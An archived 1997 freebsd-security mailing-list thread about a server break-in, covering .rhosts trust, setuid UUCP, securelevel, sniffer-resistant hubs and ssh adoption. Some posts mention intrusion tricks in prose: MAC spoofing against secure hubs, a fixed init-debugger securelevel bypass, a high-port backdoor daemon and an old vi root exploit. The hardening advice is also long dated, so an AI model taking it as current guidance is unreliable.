Received: (from pechter@localhost) by i4got.lakewood.com id PAA12852 (8.8.5/IDA-1.6); Tue, 29 Jul 1997 15:30:10 -0400 (EDT)
From: Bill Pechter
Message-ID: <199707291930.PAA12852@i4got.lakewood.com>
Subject: Re: security hole in FreeBSD
To: adam@homeport.org (Adam Shostack)
Date: Tue, 29 Jul 1997 15:30:10 -0400 (EDT)
Cc: freebsd-security@freebsd.org
In-Reply-To: <199707291855.OAA14671@homeport.org> from Adam Shostack at "Jul 29, 97 02:55:21 pm"
Reply-to: pechter@lakewood.com
X-Phone-Number: 908-389-3592
X-Mailer: ELM [version 2.4ME+ PL19 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

FreeBSD'ers

Adam and I have been debating this one offline a bit.

I brought this one back to freebsd-security to see if I'm the only one that
has a problem with removing suid from uucp or removing uucp from the base
distribution -- I'll avoid continuing this if others here think I should
drop this one. I don't want to suck bandwidth if there's not a serious
effort to change the way FreeBSD ships.

It may be I'm just having a bad day -- but I think:

The day FreeBSD stops including stuff like UUCP in the base system is the
day I find another (NetBSD/OpenBSD/Linux) OS.

I like the fact it is ALL of Unix. Put a package together that will
shut down the SUID stuff -- keep this out of the standard distribution.

Most linux admins have never seen Cops/Tripwire/TCP Wrappers. If you're
allowing others to connect to your machine you need to determine the amount
of risk you are willing to allow and work to decide how to protect yourself.
Inherent with connectivity is risk. Inherent with protection is knowing
that NO machine is automatically secure out of the box.

I worked with a number of commercial Unix systems running C2 and B2 security
and they all came in an unsecure manner and you turned on the audit and
security features used to bring them to a more secure level.

If you want to connect to the internet then YOU need to firewall/harden the
security of the system.
If you're running it as an IN-HOUSE machine you may not care about
maximizing security.

It's a base-level functionality vs. security debate.

> From: Adam Shostack
> | >
> | > I don't deny there are people doing it, but anyone who wants
> | > to run UUCP knows enough to turn it on. Most people don't use it;
> | > there exists a potential of a security hole, it should ship turned
> | > off, possibly with a script to turn it on.
> | >
> | > Want to take a stab at how many Freebsd users know what HDB
> | > stands for? How it differs from Taylor? Heck, how many know what
> | > uucp stands for?
> | >
> | > Adam
> |
> | Bill Pechter wrote:
> | Everyone I taught Unix admin knows all of that. Anyone doing Unix admin
> | should know that.
>
> From: Adam Shostack
>
> Should, but do they? This guy with the problem sure doesn't. Most
> linux admins don't, if you read the cert summaries. We need to
> improve the baseline. You and I, and anyone else who wants to run
> UUCP can turn it on.

Bill
------------------------------------------------------------------------------
Bill Pechter | 17 Meredith Drive Tinton Falls, NJ 07724 | 908-389-3592
pechter@lakewood.com | Save computing history, give an old geek old hardware.
This msg brought to you by the letters PDP and the number 11.

From owner-freebsd-security Tue Jul 29 12:38:31 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA08015 for security-outgoing; Tue, 29 Jul 1997 12:38:31 -0700 (PDT)
Received: from nexus.astro.psu.edu (nexus.astro.psu.edu [128.118.147.20]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id MAA08007 for ; Tue, 29 Jul 1997 12:38:28 -0700 (PDT)
Received: from mstar.astro.psu.edu by nexus.astro.psu.edu (4.1/Nexus-1.3) id AA14852; Tue, 29 Jul 97 15:38:23 EDT
Received: by mstar.astro.psu.edu (SMI-8.6/Client-1.3) id PAA03520; Tue, 29 Jul 1997 15:38:15 -0400
Message-Id: <19970729153815.19286@astro.psu.edu>
Date: Tue, 29 Jul 1997 15:38:15 -0400
From: Matthew Hunt
To: Poul-Henning Kamp
Cc: security@FreeBSD.ORG
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)
Reply-To: Matthew Hunt
References: <284.870203173@critter.dk.tfs.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.76
In-Reply-To: <284.870203173@critter.dk.tfs.com>; from Poul-Henning Kamp on Tue, Jul 29, 1997 at 09:06:13PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, Jul 29, 1997 at 09:06:13PM +0200, Poul-Henning Kamp wrote:

> Except that most of them are easy to spoof: Set up your sniffer to
> output 10 packets with different "from" MAC and it figures "hey port
> #4 is upstream, send it everything..."

I think some can be configured with hardcoded associations between the
MAC and port, rather than learning them on their own. Such beasts are
used for the residence hall networks at Penn State.

From owner-freebsd-security Tue Jul 29 12:43:50 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA08379 for security-outgoing; Tue, 29 Jul 1997 12:43:50 -0700 (PDT)
Received: from chaos.amber.org (root@chaos.amber.org [205.231.232.12]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA08366 for ; Tue, 29 Jul 1997 12:43:43 -0700 (PDT)
Received: from chaos.amber.org (petrilli@chaos.amber.org [205.231.232.12]) by chaos.amber.org (8.7.5/8.6.12) with SMTP id PAA23807; Tue, 29 Jul 1997 15:43:23 -0400 (EDT)
Date: Tue, 29 Jul 1997 15:43:21 -0400 (EDT)
From: Christopher Petrilli
To: Poul-Henning Kamp
cc: Warner Losh, Robert Watson, security@FreeBSD.ORG
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)
In-Reply-To: <284.870203173@critter.dk.tfs.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> >I will note that there are a few people (ODS and Bay Networks included)
> >who make what is called "secure Ethernet", which basically learns what MAC
> >address is on each port, and scrambles frames that are not destined for
> >that MAC. What usually happens is it replaces the data payload with
> >alternating 0/1, and fixes the checksum. It works just fine :-) It's
> >also generally cheaper than a switch.
>
> Except that most of them are easy to spoof: Set up your sniffer to
> output 10 packets with different "from" MAC and it figures "hey port

well, it does only allow a MAC to appear once, so you would realise this
quite quickly. But a switch is the same as well, unless you've hard
coded VLAN type information based on MAC addresses into the
switch---which is unmaintainable.

Christopher

From owner-freebsd-security Tue Jul 29 13:04:44 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA09405 for security-outgoing; Tue, 29 Jul 1997 13:04:44 -0700 (PDT)
Received: from usr03.primenet.com (root@usr03.primenet.com [206.165.6.203]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA09398 for ; Tue, 29 Jul 1997 13:04:40 -0700 (PDT)
Received: from frontera (mario1@ip62-196.vcv.primenet.com [207.218.62.196]) by usr03.primenet.com (8.8.5/8.8.5) with SMTP id NAA06507; Tue, 29 Jul 1997 13:03:49 -0700 (MST)
Date: Tue, 29 Jul 1997 13:07:55 -0700 (Pacific Daylight Time)
From: "[Mario1-]"
To: Vincent Poy
cc: Nate Williams, "Jonathan A. Zdziarski", security@freebsd.org, JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
X-X-Sender: Mario1@imap.primenet.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Vincent Poy wrote:

: Date: Mon, 28 Jul 1997 21:12:44 -0700 (PDT)
: From: Vincent Poy
: To: Nate Williams
: Cc: "Jonathan A. Zdziarski", security@freebsd.org, JbHunt, "[Mario1-]"
: Subject: Re: security hole in FreeBSD
:
: On Mon, 28 Jul 1997, Nate Williams wrote:
:
: =)Vincent Poy writes:
: =)> Apparently FreeBSD ships with .rhosts in the root account.
: =)
: =)Apparently you've yet to find a clue. Go rub yourself with clue juice,
: =)and dance the clue dance, and maybe you'll get one.
:
: Thanks so much for the above Nate. That was real helpful.
: Nothing is unhackable, and the hacker did say it was the .rhosts
: file along with perl5.00401 that did it. Nothing is foolproof.

Exactly.

Regards,
--
Mario1@PrimeNet.Com http://www.primenet.com/~mario1
Eskimo Democracy: "If you continue to subscribe to this list only to
publicly oppose any decision nanook or I make, I'm going to disallow you
post permission to this list." dwild@eskimo.com

From owner-freebsd-security Tue Jul 29 13:08:09 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA09654 for security-outgoing; Tue, 29 Jul 1997 13:08:09 -0700 (PDT)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA09618 for ; Tue, 29 Jul 1997 13:08:01 -0700 (PDT)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.5/8.8.5) id QAA15592; Tue, 29 Jul 1997 16:07:57 -0400 (EDT)
Date: Tue, 29 Jul 1997 16:07:57 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199707292007.QAA15592@khavrinen.lcs.mit.edu>
To: Christopher Petrilli
Cc: Poul-Henning Kamp, Warner Losh, Robert Watson, security@FreeBSD.ORG
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)
In-Reply-To:
References: <284.870203173@critter.dk.tfs.com>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

< said:

> well, it does only allow a MAC to appear once, so you would realise this
> quite quickly. But a switch is the same as well, unless you've hard
> coded VLAN type information based on MAC addresses into the
> switch---which is unmaintainable.

But which some organizations do anyway, because it allows them to force
their users to get permission to install any new machine.

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Tue Jul 29 13:10:37 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA09914 for security-outgoing; Tue, 29 Jul 1997 13:10:37 -0700 (PDT)
Received: from usr03.primenet.com (root@usr03.primenet.com [206.165.6.203]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA09901; Tue, 29 Jul 1997 13:10:31 -0700 (PDT)
Received: from frontera (mario1@ip62-196.vcv.primenet.com [207.218.62.196]) by usr03.primenet.com (8.8.5/8.8.5) with SMTP id NAA06883; Tue, 29 Jul 1997 13:10:29 -0700 (MST)
Date: Tue, 29 Jul 1997 13:14:36 -0700 (Pacific Daylight Time)
From: "[Mario1-]"
To: Gary Palmer
cc: Vincent Poy, Nate Williams, "Jonathan A. Zdziarski", security@FreeBSD.ORG, JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To: <29452.870154093@orion.webspan.net>
Message-ID:
X-X-Sender: Mario1@imap.primenet.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 29 Jul 1997, Gary Palmer wrote:

:
: 3) Did you really talk to him on irc, or just some lamer pretending to
: have done the hack?
:

It was him, there is no doubt about that. He goes by the nick TheCa on
IRC, and seems quite proud of his "work".

: and most importantly:
:
: 4) did you LEARN from this experience? If not, *WHY* not?

Oh yeah. But it seems no matter how much one learns, there are still more
lessons ahead.

Regards,
--
Mario1@PrimeNet.Com http://www.primenet.com/~mario1
Eskimo Democracy: "If you continue to subscribe to this list only to
publicly oppose any decision nanook or I make, I'm going to disallow you
post permission to this list." dwild@eskimo.com

From owner-freebsd-security Tue Jul 29 13:40:00 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA11385 for security-outgoing; Tue, 29 Jul 1997 13:40:00 -0700 (PDT)
Received: from verdi.nethelp.no (verdi.nethelp.no [195.1.171.130]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id NAA11380 for ; Tue, 29 Jul 1997 13:39:55 -0700 (PDT)
From: sthaug@nethelp.no
Received: (qmail 4204 invoked by uid 1001); 29 Jul 1997 20:39:45 +0000 (GMT)
To: pechter@lakewood.com
Cc: adam@homeport.org, freebsd-security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-Reply-To: Your message of "Tue, 29 Jul 1997 15:30:10 -0400 (EDT)"
References: <199707291930.PAA12852@i4got.lakewood.com>
X-Mailer: Mew version 1.05+ on Emacs 19.28.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Tue, 29 Jul 1997 22:39:45 +0200
Message-ID: <4202.870208785@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> I brought this one back to freebsd-security to see if I'm the only one that
> has a problem with removing suid from uucp or removing uucp from the base
> distribution -- ...
> It may be I'm just having a bad day -- but I think:
>
> The day FreeBSD stops including stuff like UUCP in the base system is the
> day I find another (NetBSD/OpenBSD/Linux) OS.
>
> I like the fact it is ALL of Unix. Put a package together that will
> shut down the SUID stuff -- keep this out of the standard distribution.
>
> Most linux admins have never seen Cops/Tripwire/TCP Wrappers. If you're
> allowing others to connect to your machine you need to determine the amount
> of risk you are willing to allow and work to decide how to protect yourself.
> Inherent with connectivity is risk. Inherent with protection is knowing
> that NO machine is automatically secure out of the box.
>
> I worked with a number of commercial Unix systems running C2 and B2 security
> and they all came in an unsecure manner and you turned on the audit and
> security features used to bring them to a more secure level.

There's unsecure and there's unsecure. SunOS 5.5.1 is more secure than
SunOS 4.1.4 out of the box. I've heard some people complain, but most
admins seem to like it.

I like the FreeBSD distributions - but I would be much happier if there
was an easy way to make a system more secure.
For instance a document which told you:

- These files are only necessary if you need functionality X (uucp is an
  example here). If you don't need functionality X, they can be safely
  removed.

- These files have setuid (setgid) for such and such a reason. If you don't
  need that functionality, the setuid (setgid) bit can be removed. (eg. the
  setuid bit on /usr/bin/login - only needed if you want to login to another
  user without logging out first.)

- Here's what you need to set up a reasonable changeroot environment.

If such a document was accompanied by scripts to help you do the job, even
better.

Yes, I'm willing to help to create such a document.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Tue Jul 29 14:23:40 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA13916 for security-outgoing; Tue, 29 Jul 1997 14:23:40 -0700 (PDT)
Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA13910; Tue, 29 Jul 1997 14:23:35 -0700 (PDT)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id OAA09789; Tue, 29 Jul 1997 14:23:36 -0700 (PDT)
To: Vincent Poy
cc: Gary Palmer, Nate Williams, "Jonathan A. Zdziarski", security@FreeBSD.ORG, JbHunt, "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 22:35:36 PDT."
Date: Tue, 29 Jul 1997 14:23:36 -0700
Message-ID: <9785.870211416@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> =)4) did you LEARN from this experience? If not, *WHY* not?
>
> Of course... never trust anyone on the system. Too bad there

Erm - I guess that answers the question: You didn't. :-)

The moral to this story wasn't that you should never trust anyone on the
system - that's a given anyway and you should know basic things like that
before ever even thinking of selling your services as a system admin. The
real moral here is that you should be able to trust your admins to properly
secure your system and make contingency plans beforehand for when and if
the worst happens.

Jordan

From owner-freebsd-security Tue Jul 29 14:46:38 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA15108 for security-outgoing; Tue, 29 Jul 1997 14:46:38 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA15103 for ; Tue, 29 Jul 1997 14:46:35 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id OAA11298; Tue, 29 Jul 1997 14:46:12 -0700 (PDT)
Date: Tue, 29 Jul 1997 14:46:11 -0700 (PDT)
From: Vincent Poy
To: Robert Watson
cc: Brian Buchanan, freebsd-security@FreeBSD.ORG, JbHunt, "[Mario1-]"
Subject: Re: securelevel (was: Re: security hole in FreeBSD)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 29 Jul 1997, Robert Watson wrote:

=)On Mon, 28 Jul 1997, Vincent Poy wrote:
=)
=)> On Mon, 28 Jul 1997, Brian Buchanan wrote:
=)>
=)> =)Uh, that would defeat the purpose of securelevel. It's not supposed to be
=)> =)possible to ever lower it, except when dropping into single-user mode, and
=)> =)even allowing init to do so in that instance is risky IMHO - a few months
=)> =)ago I reported a hole, which I believe was fixed, that made it possible to
=)> =)lower the securelevel by attaching a debugger to init. Even though that's
=)> =)plugged now, it's still possible that there's another way to fool the
=)> =)kernel into thinking that process 1 is requesting that securelevel be
=)> =)lowered.
=)>
=)> Anything is possible since nothing is unhackable. Would running
=)> init at securelevel 2 and then have it reboot multi-user at a lower level
=)> be possible?
=)
=)I disagree with the assertion that nothing is unhackable. My toaster is
=)unhackable. :) Depending on how you define hack, of course. But in a
=)similar vein: you say you have been carefully following the latest version
=)releases, and patching all known bugs. That is not sufficient. A site
=)needs a good security policy as well as patching known bugs. For example,
=)you should have been using ssh the entire time, and have copied the public
=)keys for the hosts to your client machine using sneaker-net. Sending any
=)unencrypted data to/from a host, especially sensitive information like the
=)root password, is an extremely bad idea.

You would think your toaster is unhackable. So is a Leica camera lens but
they still have ways to hack it.
Also, just for your information, the root password isn't even used that
often. It is only used every time the machine boots up since I run screen
and I am connected 24x7 and reattach the screen session when necessary.

=)Similarly, careful analysis of the trust relationships between the
=)machines and accounts on the machines is important -- constructing a bad
=)DNS structure can invalidate your whole security design, as if DNS is
=)corrupted, all the .rhosts stuff is vulnerable. Ideally, you would only
=)use .rhosts in combination with SSH, and then make sure that the
=)appropriate keys are in /etc/ssh_whatever, and deny connections that did
=)not match the predefined keys of all hosts. Key distribution is one of
=)the big downsides to SSH, but floppy disks can help here.

I was considering installing ssh but there is only one problem. I use
Win95 from my own side at times for various reasons as well as the other
remote admins. So an ssh client does cost money. We're volunteers and are
not getting paid in any shape or form.

=)Applications like web servers may themselves represent no immediate or
=)known security problems, but often-times web servers use third party CGI
=)programs, available publicly in source, or written by a third party for
=)the web server. Many web programs are notoriously sloppy (or ignorant),
=)and this has not been helped by the release of a number of CGI programming
=)books that haven't even touched on the issue of security. It has been
=)shown time and time again that greater access for an attacker increases
=)risk, and most CGI bugs allow shell access to the host, albeit as www or
=)nobody. Even those are problematic. And once someone is in to the
=)system, they can get around simple solutions like disabling inetd. In 15
=)seconds, I can compile and run a daemon that lets me back into an account
=)on a higher port number, and unless you know your tools are good, and how
=)to use them, you won't be able to tell.
=)I certainly won't appear in the logs. :)

That's true but I am logged on 10 times also and you would only see me
logged in once, idled 4 days, when I wasn't even idle for 2 seconds. Those
aren't in the logs either. That's why when this hacker was talking to
jbhunt, he deleted netstat but I managed to get it from another machine and
tracked him down and killed his connection. jbhunt was running a
portscanner to check for any daemons running on a higher port number but
didn't find any.

=)In the case of someone else's machine, you probably can't do anything to
=)get rid of the CGI problems, so that really leaves you with just
=)minimizing the risks in the OS. You've already touched on SUID programs
=)-- as many as possible should be disabled. If you have console access,
=)just disable root also, as you can login as root directly. Most programs
=)do not require suid, if you don't mind administrating as root. Su'ing to
=)root is clearly a risky activity, especially if you're logged in
=)unencrypted. Setting a high secure-level, as well as mounting all file
=)systems w/o setuid support, can make a big difference. Mount all file
=)systems but root as nodev, and things should move along some also.

True but the problem is we wished we had console access. If we did, none
of this would even have happened, I think.
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Tue Jul 29 14:58:27 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA15610 for security-outgoing; Tue, 29 Jul 1997 14:58:27 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA15604 for ; Tue, 29 Jul 1997 14:58:25 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id OAA11345; Tue, 29 Jul 1997 14:58:15 -0700 (PDT)
Date: Tue, 29 Jul 1997 14:58:14 -0700 (PDT)
From: Vincent Poy
To: "Rodney W. Grimes"
cc: security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707291559.IAA20259@GndRsh.aac.dev.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 29 Jul 1997, Rodney W. Grimes wrote:

=)33 mail messages from ``Vinnie'' this morning in my mail box, SNR 1:33,
=)I'm not a happy camper :-(.

Sorry Rod and everyone, I never meant for this to be a long thread in the
first place. I just thought someone might know how they got in.

=)Vince, I understand you have a security problem, could you please go
=)purchase 3 good books on security (there should be at least 1 or 2
=)mentioned in the FreeBSD handbook, if not could someone on the
=)list please provide Vince a list of ORA books on security).

That would be a good idea too. I just wish I had console access to the
machines.

=)I know this mailing list is for FreeBSD security related issues, but
=)the level of the questions and answers being posed here is at the
=)fundamental level of unix system security and the answers can be found
=)in any good book.

True; however, I wasn't talking about stuff we already know about. There
are always unknown things, it seems.
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Tue Jul 29 15:03:11 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA15845 for security-outgoing; Tue, 29 Jul 1997 15:03:11 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA15837; Tue, 29 Jul 1997 15:03:03 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA11374; Tue, 29 Jul 1997 15:02:39 -0700 (PDT)
Date: Tue, 29 Jul 1997 15:02:39 -0700 (PDT)
From: Vincent Poy
To: John Dowdal
cc: Gary Palmer, security@FreeBSD.ORG, JbHunt, "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 29 Jul 1997, John Dowdal wrote:

=)On Tue, 29 Jul 1997, Gary Palmer wrote:
=)
=)> Don't think that about Erols until you try ... I know the person who
=)> answers the abuse mail. I think he'd be offended by that statement.
=)>
=)
=)I have had very good response from erols a couple weeks ago when reporting
=)a hacked account which was used to harass people on IRC (he de-activated
=)three accounts). I simply sent accurate /whois and date/time info to
=)abuse@erols.com and got a response within minutes. Cool guy :)

I mailed abuse@erols.com last night and again this morning and still
haven't heard back from them yet.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Tue Jul 29 15:30:35 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA17208 for security-outgoing; Tue, 29 Jul 1997 15:30:35 -0700 (PDT)
Received: from verdi.nethelp.no (verdi.nethelp.no [195.1.171.130]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id PAA17189 for ; Tue, 29 Jul 1997 15:30:28 -0700 (PDT)
From: sthaug@nethelp.no
Received: (qmail 5885 invoked by uid 1001); 29 Jul 1997 22:30:24 +0000 (GMT)
To: vince@mail.MCESTATE.COM
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: securelevel (was: Re: security hole in FreeBSD)
In-Reply-To: Your message of "Tue, 29 Jul 1997 14:46:11 -0700 (PDT)"
References:
X-Mailer: Mew version 1.05+ on Emacs 19.28.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Wed, 30 Jul 1997 00:30:24 +0200
Message-ID: <5883.870215424@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

[cc list trimmed]

> I was considering installing ssh but there is only one problem.
> I use Win95 from my own side at times for various reasons as well as
> the other remote admins. So a ssh client does cost money. We're
> volunteers and are not getting paid in any shape or form.

The ssh client for Windows is $99. Educational sites are eligible for a
50% discount. Or you could run the FreeBSD version - for free.

It sounds like you're saying that the extra hassle you and your fellow
system administrators (and your users) are having because of the breakin
is worth less than $99. Are you sure you have your priorities straight?

(For comparison - I run ssh for practically *all* remote logins, even on
the same LAN. ssh won't solve all your security problems, but it can be
an important *part* of better security.)

With respect to passwords, your goal should be that no password is sent
in the clear. Ever. This is difficult to reach, but you'll find it helps
you to focus on security quite a bit.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Tue Jul 29 15:44:56 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA18228 for security-outgoing; Tue, 29 Jul 1997 15:44:56 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA18223 for ; Tue, 29 Jul 1997 15:44:52 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA11547; Tue, 29 Jul 1997 15:44:45 -0700 (PDT)
Date: Tue, 29 Jul 1997 15:44:45 -0700 (PDT)
From: Vincent Poy
To: John-David Childs
cc: security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, John-David Childs wrote:

=)On Mon, 28 Jul 1997, Vincent Poy wrote:
=)
=)> On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:
=)>
=)> =)Hrm if you always use kill -9 try the reverse, just a kill or a kill -15
=)>
=)> I did that too. Even kill -HUP only kills the master process. I
=)> had to kill the child process manually.
=)
=)That's what the killall script is for :-)

I know =) But as long as I kill the processes, it wouldn't matter how I
killed it anyways.

=)Since I've finally plowed through the dozens (hundreds? ;-) of messages on
=)the subject...

So much I was like always 2 hours behind ;-(

=)None of my FreeBSD systems have ever installed a /root/.rhosts file to my
=)knowledge, unless it's been a zero length file. I'd have to grok the
=)scripts, but I know for a fact that a FreeBSD install wouldn't know to
=)create a /root/.rhosts that had the name of your other machine in it.
=)Some one of your admins did that luser trick (e.g. to enable rsh/rcp).

I know that after I was looking at the machine. It seems like the owner
had FreeBSD since whatever version came out in 1994, and none of us were
running the machines until Summer 1996, so when our accounts were created,
it came with a .rhosts file. Isn't rsh enabled by default in inetd.conf?

=)Second, my interpretation of the init man page suggests that securelevel 1
=)would PREVENT me from writing to mounted disks at the time the securelevel
=)1 is "invoked". So, for instance, if I used sysctl to change
=)kern.securelevel from 0 to 1 *right now*, my server processes (httpd,
=)sendmail, etc.) would suddenly blow up because they couldn't write to the
=)disks.
=)Thus, the only time one would want to invoke securelevel 1 would be
=)from /etc/rc before the disks are mounted. Correct???

True.

=)(The rest is dribble mostly directed to Vince, but possibly useful to
=)others).
=)
=)Third, Vince stated something to the effect that Jordan Hubbard couldn't
=)hold a candle to this hacker ("wasn't in the same league") and then posted
=)IRC dribble. I'd bet this hacker couldn't hold a candle to Jordan and
=)probably is just a luser with a copy of rootkit. (Just had to get that one
=)off my mind ;)

My apologies to Jordan but I was not saying it was a FreeBSD problem all by
itself. I as well as others know that FreeBSD is known to be a very solid
system. Back in the old days in 1991 before there was FreeBSD, 386bsd was
out but Linux seemed to be better at that time so I ran it and even then,
as long as the user had a shell account, he just ran vi and then used
virecover and he got root on the machine. I tried the same trick and it
worked too. So it isn't always the core of the OS itself. Remember FreeBSD
from 1.0 all the way to 1995 didn't really have security problems. During
1996 and 1997, FreeBSD security has sent more than a few dozen things that
are vulnerable. mount msdos and suidperl were among things that lots of
people didn't know about before. Last year, we were watching a hacker
telnet into a FreeBSD machine as root with the letmein password and we
tried it and it worked. One can always write code that would corrupt the
system in some way. Remember I did say that this user complained about perl
not working so I upgraded to perl5.00401 from perl5.003 which already has a
security hole as pretty much everyone knows. After the perl update was when
all of this happened. I could understand how he hacked mercury.GAIANET.NET
since he had an account from there to begin with. But earth.GAIANET.NET, he
absolutely had no access to in the first place.
